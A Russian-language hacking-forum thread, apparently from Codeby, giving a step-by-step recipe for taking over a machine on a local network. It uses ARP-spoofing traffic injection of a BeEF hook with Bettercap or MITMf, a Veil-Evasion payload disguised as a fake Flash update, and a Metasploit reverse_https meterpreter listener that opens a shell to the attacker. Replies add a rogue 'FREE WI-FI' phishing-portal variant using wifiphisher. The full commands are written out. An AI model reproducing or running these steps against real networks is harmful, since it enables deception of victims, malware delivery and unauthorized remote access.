Соц.инженерия или как доставить полезную нагрузку

Всем привет.
Сегодня я хочу рассказать как можно используя связку инструментов, получить доступ к удаленной машине в сегменте локальной сети.
Данный материал предназначен для аудитории которая владеет навыками пользователя в среде линукс, так же есть понимания топологии сетей.
Для этого нам понадобиться:
1.Veil-Evasion.
2.Metasploit.
3.Beef.
4 Bettercap ( Mitmf тоже подойдет ).
Я не буду подробно останавливаться на установке и использовании Veil-Evasion ,
кто не знаком с данным инструментом, у нас на форуме эту тему подробно описали,вот ссылка:
https://codeby.net/threads/vzlom-udalennogo-pk-veil-evasion-metasploit.57819/
Metasploit и Beef стоят в самом дистрибутиве кали.
Bettercap устанавливаем командой apt-get install bettercap
Кто предпочитает mitmf, то иногда связка mitmf+Beef не корректно работает:

заплатка.png


лечиться это следующей заплаткой
easy_install -U pip
pip install Twisted==15.5.0


Отдельно хочу отметить инструмент для тестирования на проникновения Beef,
это сокращение от Browser Exploitation Framework (фреймворк эксплуатации браузеров).
Он позволяет выжать максимум из внедрения JS-кода.
Я считаю что на данный момент это лучший инструмент для проведения XSS-атак.

А сейчас давайте приступим к практической реализации.
1. Запускаем фраемворк Beef , его можно запустить как из меню так и из консоли, если запускать из консоли то заходим в каталог используя следующую команду:

cd /usr/share/beef-xss/
./beef

запус beef.png

Консоль не закрываем!
Далее открываем браузер и в строке вводим следующий адрес

http://localhost:3000/ui/authentication

Login: beef
Pasword: beef

воод пароля beef.png


после не хитрых манипуляций попадаем в графический интерфейс управления фраемворка.


1111.png


2.Далее открываем новую консоль и запускаем bettercap, в моем случае строка будет выглядеть следующим образом:

sudo bettercap -T 192.168.0.109 --proxy-module injectjs --js-url "http://192.168.0.102:3000/hook.js"

запуск bettercapa.png


где адрес 192.168.0.109 -эта машина в отношении которой производиться тестирование.
адрес 192.168.0.102 -это адрес машины с которой мы атакуем.
Консоль не закрываем!

Если кто не знает, как узнать свой ip, то делается это командой ifconfig.

ifconfig.png


Кто предпочитает пользоваться инструментом mitmf, то строка будет выглядеть следующим образом:

python mitmf.py -i wlan0 --target 192.168.0.109 --gateway 192.168.0.15 --arp --spoof --inject --js-url http://192.168.0.102:3000/hook.js

wlan0-это интерфейс
192.168.0.15 это адрес роутера, узнать его можно командой route -n

routen.png


Далее нам нужно сгенерировать полезную нагрузку, для этого будем использовать инструмент Veil-Evasion.
Еще раз повторюсь, по данной ссылке:
https://codeby.net/threads/vzlom-udalennogo-pk-veil-evasion-metasploit.57819/
вы можете ознакомится с установкой, а так же, там подробно описано как создать нужный нам файл.

После того как сгенерировали файл , нам нужно запустить сервер.
я это делал в том же каталоге где была сгенерирована полезная нагрузка, следующей командой

python -m SimpleHTTPServer 8081
консоль не закрываем!

Где 8081 это порт на котором у нас будет крутится сервер.(порт выбирайте произвольно, не обязательно брать такой как у меня.)
Следующим шагом будет запуск метасплойта,(нужно же нам принимать чем то данные, от полезной нагрузки).:rolleyes:
Это можно сделать двумя способами, самым простым на мой взгляд это в новой консоли написать строчку следующего содержания,в моем случае это будет выглядеть так
msfconsole -r /usr/share/veil-output/handlers/load_flash_handler.rc

Для тех кто не ищет легких путей:
запускаем метасплойт командой: msfconsole
далее вводим:

use multi/handler
set payload windows/meterpreter/reverse_https
set LHOST 192.168.0.102
(свой внутренний IP )
set LPORT 4444 (вводим порт на котором будет слушаться полезная нагрузка, не путать с портом сервера!!!)
exploit
Консоль не закрываем!
ПО ИТОГУ У НАС ДОЛЖНО БЫТЬ ОТКРЫТЫ ЧЕТЫРЕ КОНСОЛИ.

Сейчас давайте вернемся к нашему фраемворку Beef, перед нами как вы видите, расположен графический интерфейс.
Обратите внимание на крайнюю колонку ,слева сверху, там отображаются ip машин у которых браузеры, уязвимы к атаке xcc, и наш beef их подцепил.
Дальше, мы выбираем наш подцепленный браузер и переходим во вкладку Commands.

beef левая колонка.png


Находим там пункт Social Engineering, далее Fake Flash Update, кликаем на нем, и перед нами откроется окно где вместо ip по умолчанию, нужно будет вставить наши данные.
В моем случае это выглядит таким образом :
http://192.168.0.102:3000/adobe/flash_update.png
http://192.168.0.102:8081/flash_update12.exe

последняя фаза beef.png


Далее в нижнем правом углу нажимаем на кнопку Execute.
Если вы все сделали верно, то на машине у жерты появиться окно для обновления Adobe Flash Player.Как только жертва запустит обновление, у нас откроется сессия.

На этом пока всё, спасибо за внимание. :)
 
Последнее редактирование:
Ничего конечно сказать не хочу плохого, но может кому полезно будет. Именно с Пэррот ОС я стал испытывать такие проблемы, и не только с beef, SET , другие приложения. В кали - все стабильно, в Пэррот как то все шатко =) Сейчас проверили на 4 машинах со свежей установкой Кали - все четко, поставил Пэррот на другую тачку - тоже самое - не завелось =) Так то как то =)

Kali Linux конкретно заточен для пентестов и там почти все работает без бубнов и танцов в отличии от других ОС...
 
Kali Linux конкретно заточен для пентестов и там почти все работает без бубнов и танцов в отличии от других ОС...
Parrot OS тоже как бы заточен. Даже одни и те же репы для обновления системы. Тут скорее дело в сырости Parrot - разрабочики пытась решить одну задачу, нанесли ущерб другой. Пэррот идет по пути легкости и скорости в противовес Кали, у которой аппетиты с каждым релизом все больше и больше.


Добавлено 05 марта

Beef-xss + wifiphisher - очень отличная вариация.
#wifiphisher --nojamming --essid "FREE WI-FI" -p oauth-login <--- тут специально сформированный файл, вернее отредактированный index.html , в который вставлен скрипт биф
После запуска и коннекта ( если этой iphone то вообще хорошо, так как нажав на название сети и выбрав подключиться, на смарте АВТОМАТИЧЕСКИ вспылвает окно ( фейковое ) и стартует скрипт) на Андроиде надо после покдлючения браузер запускать.
Так вот, почему то срабатывает 1 раз из 20, так как после запуска wifiphisher beef отваливается, причем сканом видно 3000 порт открыт, но нет связи. Гасим фишер, убиваем процесс, далее service beef-xss restart и вновь все ок, старутем фишер и тут как карта ляжет. Кто то может прокоментировать ситуацию? так раз 20-30 сделаешь и опять вроде ловит.
 
Последнее редактирование:
тогда мне непонятен термин "серый IP" ... :-\ Динамический в любом случае не постоянный... если подключение к сети каждый раз разное, то и IP будет разным...
Ну что не понятного белый виден в интернете,белый находится за nat
 
Всем привет.
Сегодня я хочу рассказать как можно используя связку инструментов, получить доступ к удаленной машине в сегменте локальной сети.
8081/flash_update12.exe --это TOT экзешник, который сгенерировал VEIL ?
 
Последнее редактирование модератором:
Спасибо за интересную статью.!!!
Крайне приятно вас читать!
 
Не совсем понял,для чего тут используется BeeF. Предположим мы подняли сервер,сгенерили нагрузку (js),запустили перенаправление траффика в bettercap и ловим сессию в MSF. Что в этой связке делает BeeF ?
 
а вы попробуйте сделать как вы говорили, и сделать как я описал, и все сами поймете. тем более я в статье описал для чего нужен Beef и что он делает.
 
Читайте внимательно статью..
 
Я читал там только с експлойта, а мне нужно своего трояна
там все подробно расписано, вы можете любым инструментом создать полезную нагрузку, и потом из этой папки где она создана запускаете сервер.
python -m SimpleHTTPServer 8081
 
если он запустит полезную нагрузку..то закрыта страница или открыта, значение не имеет..
 
Проделал все как в статье. Explorer выдал сообщение, что мол этот файл скачивается очень редко и может нанести вред компьютеру. Печально.
 
ну это стандартная защита, даже на нормальные файлы так ругается.
 
Это не просто социальная инженерия)) Это навыки цифрового иллюзиониста, мать его!
 
  • Нравится
Реакции: Vertigo и kot-gor
На форумх вообще не сижу, считаю их бесполезной тратой времени...
Но кодибай меня радует!
Всем добра!
 
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab

🚀 Первый раз на Codeby?
Гайд для новичков: что делать в первые 15 минут, ключевые разделы, правила
Начать здесь →
🔴 Свежие CVE, 0-day и инциденты
То, о чём ChatGPT ещё не знает — обсуждаем в реальном времени
Threat Intel →
💼 Вакансии и заказы в ИБ
Pentest, SOC, DevSecOps, bug bounty — работа и проекты от проверенных компаний
Карьера в ИБ →

HackerLab